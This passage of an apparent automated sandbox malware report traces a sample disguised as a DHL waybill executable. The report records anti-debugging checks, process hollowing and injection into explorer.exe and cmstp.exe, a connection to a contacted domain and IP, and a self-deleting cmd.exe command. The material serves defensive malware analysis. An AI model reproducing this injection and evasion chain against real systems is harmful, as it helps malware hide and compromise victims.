          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04778F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04778B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0476131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0477070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0477070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04775BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0475D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0476138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.paycheckstubonlin.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.171 80
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 1250000
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeThread register set: target process: 3688
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3688
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess created: C:\Users\user\Desktop\DHL WB# 2343640950.exe C:\Users\user\Desktop\DHL WB# 2343640950.exe
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess created: C:\Users\user\Desktop\DHL WB# 2343640950.exe C:\Users\user\Desktop\DHL WB# 2343640950.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL WB# 2343640950.exe"
          Source: explorer.exe, 00000008.00000000.473241868.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.541582387.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.429858692.00000000058B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.473241868.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.452635282.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.541499450.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.473241868.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.425347355.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.453676551.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.473241868.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.425347355.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.453676551.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Users\user\Desktop\DHL WB# 2343640950.exe VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
